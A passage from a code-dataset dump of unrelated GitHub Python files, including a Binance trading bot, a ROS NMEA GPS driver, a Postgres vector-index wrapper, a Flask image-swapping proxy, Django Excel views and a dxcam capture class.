print('\\nOrders placed:-')\n for i in orders:print(i)\n\n if msg['b'] <= buy_price :\n try:\n quantity = float(client.get_asset_balance(asset=sell)['free'])*fraction/float(msg['b'])\n quantity = floor(quantity*(10**decimals))/10**decimals\n order = client.order_limit_buy(symbol=coin,quantity=quantity,price=msg['b'])\n orders.append('Bought {1} coins at {0} price'.format(msg['b'],quantity))\n except Exception as e:\n # print(e.message)\n last_error_message = e\n elif msg['b'] >= sell_price:\n try:\n quantity = float(client.get_asset_balance(asset=buy)['free'])*fraction\n quantity = floor(quantity*(10**decimals))/10**decimals\n order = 
client.order_limit_sell(symbol=coin,quantity=quantity,price=msg['b'])\n orders.append('Sold {1} coins at {0} price'.format(msg['b'],quantity))\n except Exception as e:\n # print(e.message)\n last_error_message = e\ndef average_price(prices):\n total = 0\n for i in prices:total+=float(i['p'])\n return total/len(prices)\n\nclient = Client(api_key, api_secret)\n\ntry:\n coin1,coin2 = input('Enter coins to trade(Default: BNB USDT ): ').upper().split()\nexcept:\n coin1 = 'BNB'\n coin2 = 'USDT'\ntry:\n coin = coin1+coin2\n prices = client.get_aggregate_trades(symbol=coin)\n buy = coin1\n sell = coin2\nexcept:\n coin = coin2+coin1\n prices = client.get_aggregate_trades(symbol=coin)\n buy = coin2\n sell = coin1\nprint(\"Current average price of\",coin,\"is\",average_price(prices))\nprint(\"Last price of\",coin,\"is\",prices[-1]['p'])\nprofit=0\nwhile profit<=0.2:\n choice = input('Buying and selling price should differ by 0.2% atleast...hit enter to continue')\n if choice == \"\":\n buy_price = input('Enter your buying price: ')\n sell_price = input('Enter your selling price: ')\n profit=(((float(sell_price)-float(buy_price))/float(buy_price))*100)\n else:break\n\nfraction = input('Enter fraction of quantity(ex: 0.5 ,Default: 1.0): ')\nif fraction == '':\n fraction = 1\nelse:\n fraction = float(fraction)\n\ndecimals = float(input('Decimals to round(Ex:- 2)'))\nprint(\"Profit margin: \",profit,\"%\")\n\nbm = BinanceSocketManager(client)\nbm.start_symbol_ticker_socket(coin, process_message)\nbm.start()\n","repo_name":"SauravKanchan/Binance_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"23967119811","text":"import math\n\nimport rospy\n\nfrom sensor_msgs.msg import NavSatFix, NavSatStatus, TimeReference\nfrom geometry_msgs.msg import TwistStamped, QuaternionStamped\nfrom tf.transformations import quaternion_from_euler\n\nfrom libnmea_navsat_driver.checksum_utils import check_nmea_checksum\nimport libnmea_navsat_driver.parser\n\n\nclass RosNMEADriver(object):\n \"\"\"ROS driver for NMEA GNSS devices.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize the ROS NMEA driver.\n\n :ROS Publishers:\n - NavSatFix publisher on the 'fix' channel.\n - TwistStamped publisher on the 'vel' channel.\n - QuaternionStamped publisher on the 'heading' channel.\n - TimeReference publisher on the 'time_reference' channel.\n\n :ROS Parameters:\n - ~time_ref_source (str)\n The name of the source in published TimeReference messages. (default None)\n - ~useRMC (bool)\n If true, use RMC NMEA messages. If false, use GGA and VTG messages. (default False)\n - ~epe_quality0 (float)\n Value to use for default EPE quality for fix type 0. (default 1000000)\n - ~epe_quality1 (float)\n Value to use for default EPE quality for fix type 1. (default 4.0)\n - ~epe_quality2 (float)\n Value to use for default EPE quality for fix type 2. (default (0.1)\n - ~epe_quality4 (float)\n Value to use for default EPE quality for fix type 4. (default 0.02)\n - ~epe_quality5 (float)\n Value to use for default EPE quality for fix type 5. (default 4.0)\n - ~epe_quality9 (float)\n Value to use for default EPE quality for fix type 9. 
(default 3.0)\n \"\"\"\n self.fix_pub = rospy.Publisher('fix', NavSatFix, queue_size=1)\n self.vel_pub = rospy.Publisher('vel', TwistStamped, queue_size=1)\n self.heading_pub = rospy.Publisher(\n 'heading', QuaternionStamped, queue_size=1)\n self.use_GNSS_time = rospy.get_param('~use_GNSS_time', False)\n if not self.use_GNSS_time:\n self.time_ref_pub = rospy.Publisher(\n 'time_reference', TimeReference, queue_size=1)\n\n self.time_ref_source = rospy.get_param('~time_ref_source', None)\n self.use_RMC = rospy.get_param('~useRMC', False)\n self.valid_fix = False\n\n # epe = estimated position error\n self.default_epe_quality0 = rospy.get_param('~epe_quality0', 1000000)\n self.default_epe_quality1 = rospy.get_param('~epe_quality1', 4.0)\n self.default_epe_quality2 = rospy.get_param('~epe_quality2', 0.1)\n self.default_epe_quality4 = rospy.get_param('~epe_quality4', 0.02)\n self.default_epe_quality5 = rospy.get_param('~epe_quality5', 4.0)\n self.default_epe_quality9 = rospy.get_param('~epe_quality9', 3.0)\n self.using_receiver_epe = False\n\n self.lon_std_dev = float(\"nan\")\n self.lat_std_dev = float(\"nan\")\n self.alt_std_dev = float(\"nan\")\n\n \"\"\"Format for this dictionary is the fix type from a GGA message as the key, with\n each entry containing a tuple consisting of a default estimated\n position error, a NavSatStatus value, and a NavSatFix covariance value.\"\"\"\n self.gps_qualities = {\n # Unknown\n -1: [\n self.default_epe_quality0,\n NavSatStatus.STATUS_NO_FIX,\n NavSatFix.COVARIANCE_TYPE_UNKNOWN\n ],\n # Invalid\n 0: [\n self.default_epe_quality0,\n NavSatStatus.STATUS_NO_FIX,\n NavSatFix.COVARIANCE_TYPE_UNKNOWN\n ],\n # SPS\n 1: [\n self.default_epe_quality1,\n NavSatStatus.STATUS_FIX,\n NavSatFix.COVARIANCE_TYPE_APPROXIMATED\n ],\n # DGPS\n 2: [\n self.default_epe_quality2,\n NavSatStatus.STATUS_SBAS_FIX,\n NavSatFix.COVARIANCE_TYPE_APPROXIMATED\n ],\n # RTK Fix\n 4: [\n self.default_epe_quality4,\n NavSatStatus.STATUS_GBAS_FIX,\n NavSatFix.COVARIANCE_TYPE_APPROXIMATED\n ],\n # RTK Float\n 5: [\n self.default_epe_quality5,\n NavSatStatus.STATUS_GBAS_FIX,\n NavSatFix.COVARIANCE_TYPE_APPROXIMATED\n ],\n # WAAS\n 9: [\n self.default_epe_quality9,\n NavSatStatus.STATUS_GBAS_FIX,\n NavSatFix.COVARIANCE_TYPE_APPROXIMATED\n ]\n }\n\n def add_sentence(self, nmea_string, frame_id, timestamp=None):\n \"\"\"Public method to provide a new NMEA sentence to the driver.\n\n Args:\n nmea_string (str): NMEA sentence in string form.\n frame_id (str): TF frame ID of the GPS receiver.\n timestamp(rospy.Time, optional): Time the sentence was received.\n If timestamp is not specified, the current time is used.\n\n Returns:\n bool: True if the NMEA string is successfully processed, False if there is an error.\n \"\"\"\n if not check_nmea_checksum(nmea_string):\n rospy.logwarn(\"Received a sentence with an invalid checksum. \" +\n \"Sentence was: %s\" % repr(nmea_string))\n return False\n\n parsed_sentence = libnmea_navsat_driver.parser.parse_nmea_sentence(\n nmea_string)\n if not parsed_sentence:\n rospy.logdebug(\n \"Failed to parse NMEA sentence. 
Sentence was: %s\" %\n nmea_string)\n return False\n\n if timestamp:\n current_time = timestamp\n else:\n current_time = rospy.get_rostime()\n current_fix = NavSatFix()\n current_fix.header.stamp = current_time\n current_fix.header.frame_id = frame_id\n if not self.use_GNSS_time:\n current_time_ref = TimeReference()\n current_time_ref.header.stamp = current_time\n current_time_ref.header.frame_id = frame_id\n if self.time_ref_source:\n current_time_ref.source = self.time_ref_source\n else:\n current_time_ref.source = frame_id\n\n if not self.use_RMC and 'GGA' in parsed_sentence:\n current_fix.position_covariance_type = \\\n NavSatFix.COVARIANCE_TYPE_APPROXIMATED\n\n data = parsed_sentence['GGA']\n\n if self.use_GNSS_time:\n if math.isnan(data['utc_time'][0]):\n rospy.logwarn(\"Time in the NMEA sentence is NOT valid\")\n return False\n current_fix.header.stamp = rospy.Time(data['utc_time'][0], data['utc_time'][1])\n\n fix_type = data['fix_type']\n if not (fix_type in self.gps_qualities):\n fix_type = -1\n gps_qual = self.gps_qualities[fix_type]\n default_epe = gps_qual[0]\n current_fix.status.status = gps_qual[1]\n current_fix.position_covariance_type = gps_qual[2]\n\n self.valid_fix = (fix_type > 0)\n\n current_fix.status.service = NavSatStatus.SERVICE_GPS\n\n latitude = data['latitude']\n if data['latitude_direction'] == 'S':\n latitude = -latitude\n current_fix.latitude = latitude\n\n longitude = data['longitude']\n if data['longitude_direction'] == 'W':\n longitude = -longitude\n current_fix.longitude = longitude\n\n # Altitude is above ellipsoid, so adjust for mean-sea-level\n altitude = data['altitude'] + data['mean_sea_level']\n current_fix.altitude = altitude\n\n # use default epe std_dev unless we've received a GST sentence with\n # epes\n if not self.using_receiver_epe or math.isnan(self.lon_std_dev):\n self.lon_std_dev = default_epe\n if not self.using_receiver_epe or math.isnan(self.lat_std_dev):\n self.lat_std_dev = default_epe\n if not self.using_receiver_epe or math.isnan(self.alt_std_dev):\n self.alt_std_dev = default_epe * 2\n\n hdop = data['hdop']\n current_fix.position_covariance[0] = (hdop * self.lon_std_dev) ** 2\n current_fix.position_covariance[4] = (hdop * self.lat_std_dev) ** 2\n current_fix.position_covariance[8] = (\n 2 * hdop * self.alt_std_dev) ** 2 # FIXME\n\n self.fix_pub.publish(current_fix)\n\n if not (math.isnan(data['utc_time'][0]) or self.use_GNSS_time):\n current_time_ref.time_ref = rospy.Time(\n data['utc_time'][0], data['utc_time'][1])\n self.last_valid_fix_time = current_time_ref\n self.time_ref_pub.publish(current_time_ref)\n\n elif not self.use_RMC and 'VTG' in parsed_sentence:\n data = parsed_sentence['VTG']\n\n # Only report VTG data when you've received a valid GGA fix as\n # well.\n if self.valid_fix:\n current_vel = TwistStamped()\n current_vel.header.stamp = current_time\n current_vel.header.frame_id = frame_id\n current_vel.twist.linear.x = data['speed'] * math.sin(data['true_course'])\n current_vel.twist.linear.y = data['speed'] * math.cos(data['true_course'])\n self.vel_pub.publish(current_vel)\n\n elif 'RMC' in parsed_sentence:\n data = parsed_sentence['RMC']\n\n if self.use_GNSS_time:\n if math.isnan(data['utc_time'][0]):\n rospy.logwarn(\"Time in the NMEA sentence is NOT valid\")\n return False\n current_fix.header.stamp = rospy.Time(data['utc_time'][0], data['utc_time'][1])\n\n # Only publish a fix from RMC if the use_RMC flag is set.\n if self.use_RMC:\n if data['fix_valid']:\n current_fix.status.status = NavSatStatus.STATUS_FIX\n 
else:\n current_fix.status.status = NavSatStatus.STATUS_NO_FIX\n\n current_fix.status.service = NavSatStatus.SERVICE_GPS\n\n latitude = data['latitude']\n if data['latitude_direction'] == 'S':\n latitude = -latitude\n current_fix.latitude = latitude\n\n longitude = data['longitude']\n if data['longitude_direction'] == 'W':\n longitude = -longitude\n current_fix.longitude = longitude\n\n current_fix.altitude = float('NaN')\n current_fix.position_covariance_type = \\\n NavSatFix.COVARIANCE_TYPE_UNKNOWN\n\n self.fix_pub.publish(current_fix)\n\n if not (math.isnan(data['utc_time'][0]) or self.use_GNSS_time):\n current_time_ref.time_ref = rospy.Time(\n data['utc_time'][0], data['utc_time'][1])\n self.time_ref_pub.publish(current_time_ref)\n\n # Publish velocity from RMC regardless, since GGA doesn't provide\n # it.\n if data['fix_valid']:\n current_vel = TwistStamped()\n current_vel.header.stamp = current_time\n current_vel.header.frame_id = frame_id\n current_vel.twist.linear.x = data['speed'] * \\\n math.sin(data['true_course'])\n current_vel.twist.linear.y = data['speed'] * \\\n math.cos(data['true_course'])\n self.vel_pub.publish(current_vel)\n elif 'GST' in parsed_sentence:\n data = parsed_sentence['GST']\n\n # Use receiver-provided error estimate if available\n self.using_receiver_epe = True\n self.lon_std_dev = data['lon_std_dev']\n self.lat_std_dev = data['lat_std_dev']\n self.alt_std_dev = data['alt_std_dev']\n elif 'HDT' in parsed_sentence:\n data = parsed_sentence['HDT']\n if data['heading']:\n current_heading = QuaternionStamped()\n current_heading.header.stamp = current_time\n current_heading.header.frame_id = frame_id\n q = quaternion_from_euler(0, 0, math.radians(data['heading']))\n current_heading.quaternion.x = q[0]\n current_heading.quaternion.y = q[1]\n current_heading.quaternion.z = q[2]\n current_heading.quaternion.w = q[3]\n self.heading_pub.publish(current_heading)\n else:\n return False\n\n @staticmethod\n def get_frame_id():\n \"\"\"Get the TF frame_id.\n\n Queries rosparam for the ~frame_id param. 
If a tf_prefix param is set,\n the frame_id is prefixed with the prefix.\n\n Returns:\n str: The fully-qualified TF frame ID.\n \"\"\"\n frame_id = rospy.get_param('~frame_id', 'gps')\n # Add the TF prefix\n prefix = \"\"\n prefix_param = rospy.search_param('tf_prefix')\n if prefix_param:\n prefix = rospy.get_param(prefix_param)\n return \"%s/%s\" % (prefix, frame_id)\n else:\n return frame_id\n","repo_name":"ros-drivers/nmea_navsat_driver","sub_path":"src/libnmea_navsat_driver/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":13382,"program_lang":"python","lang":"en","doc_type":"code","stars":188,"dataset":"github-code","pt":"96"} +{"seq_id":"73933509435","text":"from psycopg_pool import ConnectionPool\nfrom psycopg import sql\nfrom typing import Any, Dict, List, Optional, Tuple\nfrom citrusdb.db import BaseDB\nimport citrusdb.db.postgres.queries as queries\nfrom citrusdb.db.postgres.query_builder import QueryBuilder\nfrom citrusdb.utils.types import IDs\nfrom citrusdb.utils.utils import convert_row_to_dict\n\n\nclass PostgresDB(BaseDB):\n _pool: ConnectionPool\n\n def __init__(\n self,\n **kwargs: Dict[str, Any]\n ):\n # Setup connection pool\n self._pool = ConnectionPool(kwargs=kwargs)\n\n # Create index_manager and index_data table if they don't exist already\n with self._pool.connection() as conn:\n with conn.cursor() as cur:\n cur.execute(queries.CREATE_INDEX_MANAGER_TABLE)\n cur.execute(queries.CREATE_INDEX_DATA_TABLE)\n conn.commit()\n\n def create_index(\n self,\n name: str,\n max_elements: int,\n M: int,\n ef_construction: int,\n allow_replace_deleted: bool,\n dimensions: Optional[int] = 1536,\n ):\n ef = ef_construction\n parameters = (name, dimensions, max_elements, M, ef, ef_construction, allow_replace_deleted)\n # Create new index entry to postgres db\n with self._pool.connection() as conn:\n with conn.cursor() as cur:\n cur.execute(queries.INSERT_INDEX_TO_MANAGER, parameters)\n conn.commit()\n\n def delete_vectors_from_index(\n self,\n index_id: int,\n ids: IDs\n ):\n \"\"\"\n Delete vectors with given list of IDs from specific index\n\n index_id: ID of index where the elements belong\n ids: List of IDs to be deleted\n \"\"\"\n\n vector_ids = []\n parameters = [ids, index_id]\n with self._pool.connection() as conn:\n with conn.cursor() as cur:\n for vector_id in cur.execute(queries.DELETE_VECTORS_FROM_INDEX, parameters):\n vector_ids.append(vector_id[0])\n conn.commit()\n\n return vector_ids\n\n def filter_vectors(self, index_name: str, filters: List[Dict]):\n \"\"\"\n Get list of IDs of vectors that match filters.\n\n index_name: Name of index where the elements belong\n filters: List of filters to be applied\n \"\"\"\n\n with self._pool.connection() as conn:\n query_builder = QueryBuilder(conn)\n res = query_builder.execute_query(index_name, filters)\n allowed_ids = []\n for row in res:\n allowed_ids.append(row[0])\n return allowed_ids\n\n def get_indices(self):\n \"\"\"\n Get all index details\n \"\"\"\n with self._pool.connection() as conn:\n with conn.cursor() as cur:\n cur.execute(queries.GET_ALL_INDEX_DETAILS)\n return cur.fetchall()\n\n def get_index_details(\n self,\n name: str\n ) -> Optional[Tuple[int, str, int, int, int, int, int, bool]]:\n \"\"\"\n Get specific index details\n\n name: Name of index to fetch\n \"\"\"\n parameters = (name,)\n with self._pool.connection() as conn:\n with conn.cursor() as cur:\n cur.execute(queries.GET_INDEX_DETAILS_BY_NAME, parameters)\n return cur.fetchone()\n\n def get_all_vectors_in_index(self, name: str, 
include: Dict) -> List[Dict]:\n \"\"\"\n Get all vectors in index\n\n name: Name of index\n include: Dictionary of columns to be returned\n \"\"\"\n index_details = self.get_index_details(name)\n if index_details is None:\n raise ValueError(f\"Index '{name}' does not exist\")\n\n cols = [sql.Identifier(\"id\")]\n if include[\"document\"]:\n cols.append(sql.Identifier(\"text\"))\n if include[\"metadata\"]:\n cols.append(sql.Identifier(\"metadata\"))\n elif include[\"metadata\"]:\n cols.append(sql.Identifier(\"metadata\"))\n\n index_id = index_details[0]\n parameters = (index_id,)\n with self._pool.connection() as conn:\n with conn.cursor() as cur:\n query = sql.SQL(queries.GET_ALL_VECTORS).format(\n sql.SQL(\", \").join(cols)\n )\n cur.execute(query, parameters)\n rows = cur.fetchall()\n return [convert_row_to_dict(row=row, include=include, with_embedding=True) for row in rows]\n\n def get_vector_ids_of_results(\n self,\n name: str,\n results: List[List[int]],\n include: Dict\n ):\n \"\"\"\n Get user facing IDs of results\n\n name: Name of index\n results: List of list of integer HNSW labels\n include: Dictionary of columns to be returned\n \"\"\"\n index_details = self.get_index_details(name)\n if index_details is None:\n raise ValueError(f\"Index '{name}' does not exist\")\n\n cols = [sql.Identifier(\"id\")]\n if include[\"document\"]:\n cols.append(sql.Identifier(\"text\"))\n if include[\"metadata\"]:\n cols.append(sql.Identifier(\"metadata\"))\n elif include[\"metadata\"]:\n cols.append(sql.Identifier(\"metadata\"))\n\n returning_list = []\n unordered_rows_list = []\n index_id = index_details[0]\n\n with self._pool.connection() as conn:\n with conn.cursor() as cur:\n data = []\n for ids in results:\n ids_list = []\n for id in ids:\n ids_list.append(int(id))\n data.append([ids_list, index_id])\n\n query = sql.SQL(queries.GET_VECTOR_IDS_OF_RESULTS).format(\n sql.SQL(\", \").join(cols)\n )\n cur.executemany(\n query,\n data,\n returning=True\n )\n while True:\n rows = cur.fetchall()\n unordered_rows_list.append(rows)\n if not cur.nextset():\n break;\n\n conn.commit()\n\n # Order rows according to order of id in ids list\n for i, ids in enumerate(results):\n unordered_rows = unordered_rows_list[i]\n ordered_rows = []\n for id in ids:\n low = 0; high = len(unordered_rows) - 1\n while (low <= high):\n mid = low + (high - low)//2\n curr_vector_id = unordered_rows[mid][0]\n if curr_vector_id == id:\n ordered_rows.append(\n convert_row_to_dict(\n row=unordered_rows[mid],\n include=include\n )\n )\n break\n elif curr_vector_id < id:\n low = mid + 1\n else:\n high = mid - 1\n\n returning_list.append(ordered_rows)\n return returning_list\n\n def insert_to_index(\n self,\n data\n ):\n \"\"\"\n Insert vectors to index\n\n data: Tuple of tuples corresponding to each row\n \"\"\"\n vector_ids = []\n with self._pool.connection() as conn:\n with conn.cursor() as cur:\n cur.executemany(queries.INSERT_DATA_TO_INDEX, data, returning=True)\n while True:\n vector_ids.append(cur.fetchone()[0]) # type: ignore\n if not cur.nextset():\n break;\n\n conn.commit()\n\n return vector_ids\n\n def update_ef(\n self,\n name: str,\n ef: int\n ):\n \"\"\"\n Update ef for an index\n\n name: Name of index to be updated\n ef: New ef value\n \"\"\"\n parameters = (ef, name)\n with self._pool.connection() as conn:\n with conn.cursor() as cur:\n cur.execute(queries.UPDATE_EF, parameters)\n 
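                # editor's note: the cursor runs on a connection borrowed from the psycopg
                # pool; the explicit commit below persists the ef update before the
                # connection is handed back to the pool.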
conn.commit()\n","repo_name":"0xDebabrata/citrus","sub_path":"citrusdb/db/postgres/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":8174,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"96"} +{"seq_id":"37153720385","text":"from django.db import models\n\n\nclass Orders(models.Model):\n    table_row_index = models.IntegerField(unique=True)\n    table_row_number = models.IntegerField()\n    order_number = models.IntegerField(\n        unique=True,\n        verbose_name='Order number'\n    )\n    cost_usd = models.DecimalField(\n        max_digits=12,\n        decimal_places=2,\n        verbose_name='Price in dollars'\n    )\n    cost_rub = models.DecimalField(\n        max_digits=12,\n        decimal_places=2,\n        verbose_name='Price in rubles'\n    )\n    delivery_date = models.CharField(\n        max_length=10,\n        verbose_name='Delivery date'\n    )\n    created_at = models.DateTimeField(\n        verbose_name='Creation date'\n    )\n    updated_at = models.DateTimeField(\n        verbose_name='Update date'\n    )\n\n    class Meta:\n        managed = False\n        db_table = 'orders'\n        verbose_name = 'Order'\n        verbose_name_plural = 'Orders'\n\n    def __str__(self):\n        return str(self.order_number)\n","repo_name":"elvir906/GoogleSheetsAPI","sub_path":"service/app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"19648214560","text":"import os\nimport json\nimport numpy as np\n\ndef get_feature_array(json_path, seg_path):\n    with open(json_path, \"r\") as f:\n        json_dict = json.load(f)\n    \n    t1 = []\n    for i in json_dict[\"training\"]:\n        t1.append(\"../data/\" + i[\"image\"][0])\n    id_ls = [i.split(\"/\")[-2].split(\"_\")[-1] for i in t1]\n\n    arr = []\n    for id_ in id_ls:\n        # load the per-id feature file (the loop variable id_, not the leftover i)\n        path = os.path.join(seg_path, id_ + \".npy\")\n        arr.append(np.load(path))\n    arr = np.concatenate(arr, axis=0)\n\n    return arr, id_ls","repo_name":"shanmukh05/MGMT-Methylation-Prediction-in-Brain-Tumors","sub_path":"features/ensemble.py","file_name":"ensemble.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"24027924518","text":"from flask import Flask, Response, request, url_for\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urljoin\nfrom PIL import Image\nimport os\nimport io\nimport urllib.request\nimport random\napp = Flask(__name__)\n\n@app.route('/')\ndef printUsage():\n\treturn \"TODO\"\n\n@app.route('/<path:url>')\ndef proxy(url):\n\tprotocol = \"http://\"\n\tfull_url = protocol+url\n\tif len(request.query_string) != 0:\n\t\tfull_url += \"?\"+request.query_string.decode('utf-8')\n\tprint('DEBUG:', full_url)\n\tresponse = urllib.request.urlopen(full_url)\n\tprint(response.info()['Content-Type'])\n\tmimetype = response.info()['Content-Type'].split(';',1)[0]\n\tdata = None\n\tif mimetype.startswith(\"image/\"):\n\t\textension = mimetype.split(\"/\")[-1]\n\t\tdimension = Image.open(io.BytesIO(response.read())).size\n\t\tprint(\"Trying to get \", extension, \" with \", dimension)\n\t\timage_to_load = get_image(extension, dimension)\n\t\tf = open(image_to_load,\"rb\")\n\t\tdata = f.read()\n\t\tf.close()\n\telif mimetype == \"text/html\":\n\t\tsoup = BeautifulSoup(response.read())\n\t\tto_rewrite = soup.find_all(needs_rewrite)\n\t\tfor elem in to_rewrite:\n\t\t\tfor attr in rewrite_attributes:\n\t\t\t\tif elem.has_attr(attr):\n\t\t\t\t\telem[attr] = rewrite_url(full_url, elem[attr])\n\t\tdata = str(soup)\n\telse:\n\t\tdata = response.read()\n\treturn Response(data, 
status=response.getcode(),\n\t\t\theaders=response.getheaders())\n\nrewrite_attributes = ['href','src']\ndef needs_rewrite(tag):\n\tglobal rewrite_attributes\n\tfor a in rewrite_attributes:\n\t\tif tag.has_attr(a):\n\t\t\treturn True\n\treturn False\n\ndef rewrite_url(full_url, relative_url):\n\tglobal app\n\ttotal_url = urljoin(full_url, relative_url)\n\tprint('DEBUG:',total_url)\n\ttry:\n\t\targument = total_url.split('://',1)[1]\n\texcept IndexError:\n\t\treturn relative_url\n\t#print(www.config['HOST'])\n\tend_result = url_for('proxy', url=argument)\n\t#end_result = \"http://\"+app.config['SERVER_NAME']+\"/\"+argument\n\tprint(full_url, relative_url, total_url, end_result)\n\treturn end_result\n\ndef get_image(extension, dimension):\n\tpossible = cat_images[extension]\n\tprint('DEBUG: possible',possible)\n\trandom.shuffle(possible)\n\tbest = possible[0]\n\tfor image in possible[1:]:\n\t\tif total_error(dimension, best[1]) > total_error(dimension, image[1]):\n\t\t\tbest = image\n\t\telif total_error(dimension, best[1]) == total_error(dimension, image[1]) and ratio_error(dimension, best[1]) > total_error(dimension, image[1]):\n\t\t\tbest = image\n\treturn best[0]\n#get_image returns file name with\n# minimal total area and minimal stretched area difference\n\ncat_images ={}\ndef populate_images(dirs):\n\tprint(\"DEBUG: populating images!\")\n\tglobal cat_images\n\tif len(cat_images.keys()) != 0:\n\t\treturn\n\tfor files in os.listdir(dirs):\n\t\tfull_path = os.path.join(dirs, files)\n\t\textension = files.split('/')[-1].split('.',1)[-1]\n\t\tif extension not in cat_images.keys():\n\t\t\tcat_images[extension] = []\n\t\tdimension = Image.open(full_path).size\n\t\tcat_images[extension].append((full_path, dimension))\n\tprint(\"DEBUG: populated images \", cat_images)\npopulate_images(os.path.join(os.path.dirname(os.path.realpath(__file__)), \"images/\"))\n\ndef total_error(dimA, dimB):\n\treturn (dimA[0]*dimA[1] - dimB[0]*dimB[1])**2\n\ndef ratio_error(dimA, dimB):\n\tnDimA_1 = float(dimA[0])/dimB[0]*dimB[1]\n\tnDimA_0 = float(dimA[1])/dimA[1]*dimB[0]\n\treturn min(total_error((dimA[0], nDimA_1), dimB),\n\t\t\ttotal_error((nDimA_0, dimA[1]), dimB))\n\nif __name__ == '__main__':\n\tapp.run()\n","repo_name":"Ben0mega/image-proxy","sub_path":"proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":3346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"11912371746","text":"import os\nfrom pathlib import Path\n\nget = os.environ.get\n\nDEBUG = False\nENVIRONMENT = get('ENV', 'production') # development, testing\nDATABASE_URL = get('DATABASE_URL', 'mongodb://localhost:27017')\nSECRET_KEY = get('SECRET_KEY', '109la0m3tK8ErcOJGJNqkQTU-KdvEqw8oEnfKZ556LQ=')\n\ntry:\n from .local_settings import *\nexcept ImportError:\n pass\n\nWEBPACK_CONFIG = {\n 'DEFAULT': {\n 'CACHE': not DEBUG,\n 'STATS_FILE': str(Path(__file__).parent.parent / 'static' / 'dist' / 'stats.json')\n },\n 'VENDOR': {\n 'CACHE': not DEBUG,\n 'STATS_FILE': str(Path(__file__).parent.parent / 'static' / 'dist' / 'vendor-stats.json')\n }\n}\n","repo_name":"vgamula/sp","sub_path":"server/settings/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"41940247210","text":"import os\n\nfrom django.conf import settings\nfrom django.utils.encoding import escape_uri_path\nfrom django.shortcuts import render, redirect\nfrom 
django.http.response import HttpResponseRedirect, HttpResponse\nfrom django.http.request import HttpRequest\n\nfrom .models import Files, FileContents, FileClasses\nfrom .db_repositoy.set_excel import Excel\nfrom .db_repositoy.get_excel import DBExcel\n\n\ndef home_page(request):\n \"\"\"\n Открытие главной страницы\n\n :param request:\n :return: home.html\n \"\"\"\n return render(request, 'excel_app/general_pages/home.html')\n\n\ndef files_list(request: HttpRequest):\n \"\"\"\n Открытие страницы со списком файлов. Так же сохранение данных в бд после нажатия кнопки.\n\n :param request:\n :return: excel_files.html\n \"\"\"\n if request.method == \"POST\":\n try:\n file = request.FILES.get('xls')\n exel_to_db = Excel(str(file), 'Sheet1', file)\n exel_to_db.set_info()\n except Exception as e:\n print(e)\n\n return render(request, 'excel_app/general_pages/excel_files.html', context={'files': Files.objects.all()})\n\n\ndef table_page(request, file_id):\n \"\"\"\n Страница с данными файла в виде таблицы. Скачать данную таблицу как excel.\n\n :param request:\n :param file_id: id файла в бд.\n :return:excel_table.html\n \"\"\"\n file_contents = FileContents.objects.filter(file_id=file_id)\n data = DBExcel(file_id)\n data.get_data() # чтение бд в data.data как pandas.DataFrame()\n file_path = os.path.join(settings.MEDIA_ROOT, \"temp\\\\\" + Files.objects.get(id=file_id).name)\n\n if os.path.exists(file_path):\n os.remove(file_path)\n print(\"exist\")\n\n if request.method == \"POST\":\n data.to_excel(file_path)\n with open(file_path, 'rb') as fh:\n name = str(Files.objects.get(id=file_id).name)\n print(name)\n response = HttpResponse(fh.read(), content_type=\"application/vnd.ms-excel\")\n response['Content-Disposition'] = 'attachment; filename=''' + escape_uri_path(name)\n return response\n\n return render(request, 'excel_app/general_pages/excel_table.html',\n context={'content': file_contents,\n 'data_html': data.to_html(),\n 'data_frame': data.get_data()})\n\n","repo_name":"YourBobi/B1","sub_path":"B1_WEB/excel_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"39557033679","text":"import ctypes\nfrom dataclasses import dataclass\nfrom typing import List\nimport comtypes\nfrom dxcam._libs.d3d11 import *\nfrom dxcam._libs.dxgi import *\n\n\n@dataclass\nclass Device:\n adapter: ctypes.POINTER(IDXGIAdapter1)\n device: ctypes.POINTER(ID3D11Device) = None\n context: ctypes.POINTER(ID3D11DeviceContext) = None\n im_context: ctypes.POINTER(ID3D11DeviceContext) = None\n desc: DXGI_ADAPTER_DESC1 = None\n\n def __post_init__(self) -> None:\n self.desc = DXGI_ADAPTER_DESC1()\n self.adapter.GetDesc1(ctypes.byref(self.desc))\n\n D3D11CreateDevice = ctypes.windll.d3d11.D3D11CreateDevice\n\n feature_levels = [\n D3D_FEATURE_LEVEL_11_0,\n D3D_FEATURE_LEVEL_10_1,\n D3D_FEATURE_LEVEL_10_0,\n ]\n\n self.device = ctypes.POINTER(ID3D11Device)()\n self.context = ctypes.POINTER(ID3D11DeviceContext)()\n self.im_context = ctypes.POINTER(ID3D11DeviceContext)()\n\n D3D11CreateDevice(\n self.adapter,\n 0,\n None,\n 0,\n ctypes.byref((ctypes.c_uint * len(feature_levels))(*feature_levels)),\n len(feature_levels),\n 7,\n ctypes.byref(self.device),\n None,\n ctypes.byref(self.context),\n )\n self.device.GetImmediateContext(ctypes.byref(self.im_context))\n\n def enum_outputs(self) -> List[ctypes.POINTER(IDXGIOutput1)]:\n i = 0\n p_outputs = []\n while True:\n try:\n p_output = 
